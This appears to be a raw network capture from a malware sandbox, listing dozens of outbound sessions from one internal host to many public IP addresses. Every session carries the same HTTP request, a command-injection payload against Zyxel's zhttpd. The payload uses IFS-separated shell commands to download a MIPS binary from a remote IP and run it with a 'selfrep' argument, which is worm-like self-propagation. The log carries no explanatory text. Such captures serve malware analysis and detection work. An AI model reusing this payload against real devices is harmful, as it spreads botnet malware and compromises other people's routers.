                                                Jan 28, 2024 10:16:29.881187916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5490192.168.2.234204261.152.48.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881203890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5491192.168.2.235114824.174.159.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881619930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5492192.168.2.2340566163.150.249.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881638050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5493192.168.2.234914297.239.68.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881676912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5494192.168.2.233799276.185.26.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881695032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5495192.168.2.233627683.147.89.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881741047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5496192.168.2.2342424114.76.110.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881762028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5497192.168.2.235738646.168.191.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881768942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5498192.168.2.2333768154.153.253.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881859064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5499192.168.2.233645457.13.51.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881860971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5500192.168.2.234486868.86.125.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881864071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5501192.168.2.2336930220.236.241.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881877899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5502192.168.2.2345916110.136.66.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881895065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5503192.168.2.2351900130.0.78.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881897926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5504192.168.2.236043031.100.203.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881906986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5505192.168.2.2355310177.150.41.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881962061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5506192.168.2.2359042133.9.105.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881980896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5507192.168.2.234608619.68.19.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882020950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5508192.168.2.234075242.15.95.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882056952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5509192.168.2.2355324116.61.172.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882071972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5510192.168.2.2351842192.204.164.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882095098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5511192.168.2.2360360164.241.48.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882111073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5512192.168.2.2333970121.207.183.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882148981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5513192.168.2.234270620.17.228.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882154942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5514192.168.2.235598245.166.73.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882190943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5515192.168.2.2357444189.7.71.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882235050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5516192.168.2.2356258105.212.227.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882247925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5517192.168.2.235541097.39.48.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882277012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5518192.168.2.2355490188.225.133.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882307053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5519192.168.2.235614497.29.14.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882332087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5520192.168.2.233965851.223.95.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882370949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5521192.168.2.2349874111.23.69.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882373095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5522192.168.2.2354372191.101.91.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882401943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5523192.168.2.2343772188.74.178.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882425070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5524192.168.2.2339830179.202.48.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882486105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5525192.168.2.2353556208.120.142.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882509947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5526192.168.2.2352674117.218.137.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882534027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5527192.168.2.2349522104.229.72.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882575035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5528192.168.2.234816472.42.25.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882591963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5529192.168.2.235767295.24.224.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882611990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5530192.168.2.2342266139.21.162.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882622957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5531192.168.2.2359172159.23.16.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882631063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5532192.168.2.2346816139.253.127.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882658958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5533192.168.2.2355966205.111.160.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882690907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5534192.168.2.2349724126.91.60.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882694960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5535192.168.2.234285674.201.90.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882735968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5536192.168.2.2353178160.38.70.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882766962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5537192.168.2.2359596123.87.241.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882795095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5538192.168.2.233386438.103.40.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882817984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5539192.168.2.2348352190.113.246.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882854939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5540192.168.2.234792276.140.36.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882877111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5541192.168.2.2341334146.109.155.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882899046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5542192.168.2.234741035.96.45.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882903099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5543192.168.2.2352054203.32.71.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882955074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5544192.168.2.2355244180.156.30.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.882961035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5545192.168.2.234082491.76.144.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883021116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5546192.168.2.235070065.83.197.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883028984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5547192.168.2.2345840202.29.91.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883063078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5548192.168.2.235977472.17.223.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883086920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5549192.168.2.2334682150.8.156.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883121967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5550192.168.2.2342138105.145.108.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883122921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5551192.168.2.2349262113.26.233.124443
                                                TimestampBytes transferredDirectionData
